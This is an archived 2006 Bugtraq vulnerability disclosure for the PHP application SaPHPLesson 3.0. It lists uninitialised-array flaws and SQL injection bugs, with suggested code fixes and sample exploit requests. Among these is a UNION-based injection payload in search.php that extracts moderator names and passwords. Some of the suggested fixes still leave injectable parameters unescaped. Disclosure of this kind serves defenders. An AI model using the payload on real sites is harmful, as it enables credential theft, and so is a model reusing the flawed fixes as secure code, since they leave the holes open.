| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 4 May 2006 21:09:41 -0000
From: o.y.6@...mail.com
To: bugtraq@...urityfocus.com
Subject: SaPHPLesson 3.0 Multbugs
SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:
1- Unfilter array
Filename :- show.php
Line :- 102
[code]
$hrow[] = $Row2;[/code]
Fix :-
Add To Line [ 11 ] /show.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$hrow = array();[/code]
Exploit :-
GET ^
/lessons/show.php?lessid=1&hrow=D3vil-0x1
/---------------------------------------------------------/
2- Unfilter array
Filename :- showcat.php
Line :- 80
[code]
$Lsnrow[] = $Row;[/code]
Fix :-
Add To Line [ 11 ] /showcat.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$Lsnrow = array();[/code]
Exploit :-
GET ^
/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1
/---------------------------------------------------------/
3- SQL Injection
Filename :- search.php
Line :- MultLines
Fix :-
Line 28 Replace It With
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]
Line 32 Replace It With
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]
Exploit :-
POST ^
Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC
/---------------------------------------------------------/
4- SQL Injection
Filename :- misc.php
Line :- 64
Fix :-
Replace Line 62 & 63 With This Code
[code]
$LID = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]
/---------------------------------------------------------/
5- Unfilter array
Filename :- index.php
Line :- 24
[code]
$rows[] = $Row;[/code]
Fix :-
Add To Line [ 11 ] /index.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$rows = array();
$hrow = array();[/code]
Exploit :-
GET ^
/saphplesson/index.php?rows=D3vil-x01
Powered by blists - more mailing lists